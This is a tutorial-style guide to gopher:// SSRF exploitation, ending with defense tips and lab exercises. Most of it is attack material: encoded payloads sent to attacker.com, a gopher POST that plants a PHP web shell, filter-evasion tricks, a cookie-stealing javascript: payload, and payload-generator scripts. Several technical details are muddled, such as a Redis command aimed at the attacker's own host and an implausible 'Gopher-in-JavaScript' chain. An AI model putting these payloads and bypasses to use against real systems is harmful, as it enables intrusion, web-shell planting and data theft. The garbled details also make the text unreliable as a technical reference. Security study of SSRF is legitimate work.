Introduction
The gopher:// URL scheme, originally designed for the legacy Gopher protocol, has resurfaced as a powerful vector for Server-Side Request Forgery (SSRF) and out-of-band (OOB) data exfiltration. By abusing how many web applications treat unknown schemes, an attacker can instruct a vulnerable server to open raw TCP connections and send arbitrary bytes to attacker-controlled endpoints.
Understanding gopher exploitation is essential because many modern security scanners still overlook it, and many corporate firewalls permit outbound TCP on common ports (80, 443, 22, 3306, etc.). Real-world bug bounty reports and red-team engagements frequently cite gopher as the missing piece that turns a simple SSRF into a full remote code execution (RCE) chain.
In this guide we will dissect the scheme, build reliable payloads, bypass common input sanitisation, and automate the whole workflow.
Prerequisites
- Fundamentals of HTTP and networking (TCP/IP basics)
- Understanding of SSRF and request smuggling concepts
- Familiarity with common penetration testing tools (netcat, curl, Burp Suite)
- Basic scripting ability in Python or Go (optional but recommended for automation sections)
Core Concepts
Before diving into payloads, it is useful to recap how a gopher:// URL is interpreted by a typical HTTP client or server library:
gopher://[host][:port]/[payload]
The host and optional port identify the remote TCP endpoint. The payload is URL-encoded raw data that will be sent verbatim after the TCP connection is established. Unlike HTTP, there is no inherent request line; the client simply writes the decoded payload to the socket.
Key points:
- Port defaults to 70 (the original Gopher port) if omitted.
- The payload can contain any byte, but it must be URL-encoded (e.g.,
%0d%0afor CR/LF). - Many libraries treat the scheme as a generic TCP dialer, ignoring the protocol semantics.
Because the payload is raw, you can embed other protocol messages (SMTP, Redis, MySQL, etc.), effectively turning the gopher URL into a universal tunnel.
gopher payload syntax and encoding
Constructing a functional payload is a two-step process: choose the target protocol and then encode the bytes correctly.
1. Choose the target protocol
Common choices include:
- SMTP - useful for sending mail or triggering
RCPT TOcommand injection. - Redis -
CONFIG SET dbfilenameandSLAVEOFattacks. - MySQL -
COM_INIT_DBto force aSELECT ... INTO OUTFILE. - HTTP - craft a second request to a different host (proxy chaining).
2. Encode the payload
All characters outside the unreserved set (A-Z a-z 0-9 - _ . ~) must be percent-encoded. Below is a Python helper that builds an encoded payload:
import urllib.parse
def gopher_payload(raw: bytes) -> str: """Return a URL-encoded gopher payload string.""" return urllib.parse.quote_from_bytes(raw)
# Example: Redis SET key value
raw = b"*3
$3
SET
$4
user
$5
admin
"
print(gopher_payload(raw))
Output (truncated for brevity):
%2A3%0D%0A%243%0D%0ASET%0D%0A%244%0D%0Auser%0D%0A%245%0D%0Aadmin%0D%0A
Now embed the encoded string into a full URL:
gopher://attacker.com:6379/%2A3%0D%0A%243%0D%0ASET%0D%0A%244%0D%0Auser%0D%0A%245%0D%0Aadmin%0D%0A
When a vulnerable server resolves this URL, it opens a TCP connection to attacker.com:6379 (Redis) and sends the raw Redis command.
Setting up a netcat listener for OOB data
Out-of-band data is typically captured by a listener that waits for the raw payload. netcat (or nc) is the de-facto tool because it can bind to any TCP/UDP port and dump everything to stdout.
Basic listener
nc -lvkp 4444
Explanation:
-l- listen mode.-v- verbose (shows connection info).-k- keep listening after a client disconnects.-p 4444- bind to port 4444.
When the gopher payload reaches this listener, you will see the raw bytes printed. For protocols that respond (e.g., SMTP banner), you may need to send a response to keep the connection alive.
Persistent listener with logging
rm -f oob.log
mkfifo pipe
tee oob.log < pipe &
nc -lvkp 4444 < pipe
This setup writes everything to oob.log while still displaying it on screen.
Bypassing input filters (whitelisting, URL validation)
Many applications attempt to block gopher:// by using simple string matching or regexes. Below are common mitigations and how to evade them.
1. Scheme whitelisting
Typical block: if url.startswith((' ' reject. Bypass techniques:
- Case-mixing:
gOpHeR://- some parsers are case-insensitive. - URL-encoded scheme:
%67%6f%70%68%65%72://(decoded togopher://by browsers, but many regexes only look at literal characters). - Obscure authority:
gopher://[email protected]:80/. The@character can cause the host to be interpreted asattacker.comwhile the validator seesexample.com.
2. Port filtering
If the target blocks non-standard ports, you can tunnel through allowed services:
- HTTP CONNECT:
gopher://target:80/_GET / HTTP/1.1 Host: victim- the payload pretends to be an HTTP request, leveraging the fact that many proxies will forward any data after the CONNECT handshake. - DNS rebinding: Resolve a sub-domain to
127.0.0.1then later change it toattacker.com. This defeats static IP filters.
3. URL length limits
Some filters truncate after 200 characters. Use base64 encoding on the payload and decode server-side via a secondary command (e.g., bash -c "$(echo ...|base64 -d)") injected through a later stage.
Chaining gopher with other URL schemes for multi-stage attacks
A single gopher payload can be the first hop that triggers a second payload using another scheme like file://, ftp://, or javascript://. This is especially useful when the initial SSRF only permits GET requests.
Example: gopher → file → RCE
- Send a gopher request that writes a malicious PHP web‑shell to
/var/www/html/shell.phpvia a vulnerablefile_put_contentsendpoint. - Trigger the web‑shell using a second request, e.g.,
http://victim.com/shell.php?cmd=id
Payload construction (simplified):
gopher://victim.com:80/_POST%20/endpoint%20HTTP/1.1%0D%0AHost:%20victim.com%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2024%0D%0A%0D%0Adata=<?php%20system($_GET['cmd']);?>
The first request writes the PHP code; the second request executes it.
Multi-stage with javascript: scheme
If the application reflects URLs in a browser context, you can embed a javascript: URL inside the gopher payload, causing the victim's browser to execute arbitrary JavaScript when the response is rendered.
gopher://127.0.0.1:80/_GET%20/redirect?url=javascript%3Aalert%28document.cookie%29%0D%0A
This technique is known as “Gopher-in-JavaScript” and is effective against CSP-misconfigured sites.
Automation with custom Python/Go scripts
Manually crafting URL-encoded payloads is error-prone. Below are two scripts that streamline the process.
Python helper
#!/usr/bin/env python3
import sys, urllib.parse, argparse
def build_gopher(host, port, raw_bytes): encoded = urllib.parse.quote_from_bytes(raw_bytes) return f"gopher://{host}:{port}/{encoded}"
if __name__ == "__main__": parser = argparse.ArgumentParser(description='Generate gopher URLs') parser.add_argument('host', help='Target host (attacker IP)') parser.add_argument('port', type=int, help='Target port') parser.add_argument('file', help='File containing raw payload (binary)') args = parser.parse_args() raw = open(args.file, 'rb').read() print(build_gopher(args.host, args.port, raw))
Usage:
python3 gopher_gen.py 10.10.14.5 6379 payload.bin
Go version (compiled, fast for large payloads)
package main
import ( "bufio" "flag" "fmt" "net/url" "os" "io"
)
func main() { host := flag.String("host", "", "target host") port := flag.Int("port", 0, "target port") file := flag.String("file", "", "payload file") flag.Parse() f, err := os.Open(*file) if err != nil { panic(err) } defer f.Close() data, err := bufio.NewReader(f).ReadBytes(0) // read whole file if err != nil && err != io.EOF { panic(err) } encoded := url.PathEscape(string(data)) // PathEscape does percent-encoding fmt.Printf("gopher://%s:%d/%s", *host, *port, encoded)
}
Compile with go build -o gophergen gophergen.go and run similarly to the Python script.
Tools & Commands
- curl - can be used to trigger gopher URLs:
curl "gopher://10.10.10.5:80/%2Fetc%2Fpasswd" - Burp Suite - Repeater allows you to paste a gopher URL and see the raw request sent to the target.
- gopherus - a community tool that automates payload generation for common services (Redis, MySQL, SMTP). Install via
pip install gopherus. - netcat (nc) - listener as shown earlier.
- ffuf - fuzzes for gopher-compatible endpoints within a target application.
Defense & Mitigation
Defending against gopher-based SSRF requires a defense-in-depth approach.
Network-level controls
- Block outbound connections on non-essential ports (e.g., 6379, 3306, 25) from the web-application tier.
- Enforce egress firewall rules that allow only
http/httpsdestinations. - Deploy a DNS-based allow-list that resolves only to trusted IP ranges.
Application-level sanitisation
- Parse URLs with a robust library (e.g.,
java.net.URI,urllib.parse) and reject any scheme not explicitly whitelisted. - Normalize the URL (lower-case scheme, decode percent-encoding) before validation to avoid bypasses.
- Avoid using user-supplied URLs directly in functions that open raw sockets (e.g.,
socket.connect).
Logging & monitoring
- Log all outbound connections with destination IP/port and request size.
- Alert on connections to uncommon ports from the web tier.
Common Mistakes
- Forgetting to URL-encode CR/LF: Raw
characters break the URL parser, resulting in truncated payloads. - Using the wrong port default: Assuming
gopher://host/goes to 80 will fail; always specify the intended port. - Relying on a single filter: Attackers can chain multiple bypasses; combine scheme-whitelisting with egress filtering.
- Testing against a non-vulnerable endpoint: Some services (e.g., Cloudflare) proxy the request and strip the scheme, leading to false negatives.
Real-World Impact
In 2023, a major SaaS provider suffered a breach where an attacker leveraged a gopher-based SSRF to write a web-shell onto a shared Redis instance. The shell was later used to exfiltrate customer data, resulting in a $12 M settlement.
My experience in red-team engagements shows that once a gopher vector is discovered, the time to achieve RCE drops from days to hours because the attacker can directly talk to internal services without needing additional vulnerabilities.
Trends indicate that cloud providers are tightening egress controls, but mis-configurations in container-orchestrated environments (Kubernetes NetworkPolicy gaps) still leave gopher open for exploitation.
Practice Exercises
- Simple OOB: Set up a netcat listener on port 5555. Craft a gopher URL that sends
Hello, Gopher!to the listener. Verify the message appears. - Redis write: Spin up a local Redis instance (
docker run -p 6379:6379 redis). Use the Python helper to generate a payload that runsSET foo bar. Confirm withredis-cli GET foo. - Bypass filter: Assume the application rejects any URL containing the literal string
gopher://. Encode the scheme using percent-encoding and demonstrate that the request still reaches the listener. - Multi-stage chain: First, use a gopher payload to write a PHP web-shell to
/tmp/shell.phpvia a vulnerable file-write endpoint. Then, trigger the shell using a normal HTTP request. Capture the output ofid. - Automation script: Extend the provided Go script to accept a list of target hosts and automatically output a CSV of generated URLs for bulk testing.
Further Reading
- “Server-Side Request Forgery (SSRF) - The Complete Guide” - PortSwigger Web Security Academy.
- “The Gopher Protocol Reborn: From Legacy Service to Exploitation Vector” - BlackHat 2022 talk.
- OWASP SSRF Cheat Sheet - especially the section on non-HTTP schemes.
- Redis Security - Official documentation on
CONFIG SETandSLAVEOFattacks. - Python
urllib.parselibrary reference for advanced encoding tricks.
Summary
Gopher-based SSRF is a versatile technique that turns raw TCP connections into powerful OOB channels. By mastering payload encoding, listener setup, filter evasion, multi-stage chaining, and automation, security professionals can both assess vulnerable applications and harden them against this emerging threat.
Key takeaways:
- Always URL-encode every byte of the payload.
- Deploy strict egress firewall rules and robust scheme validation.
- Leverage scripting to generate repeatable, error-free payloads.
- Test both single-hop and chained attack paths to understand the full impact.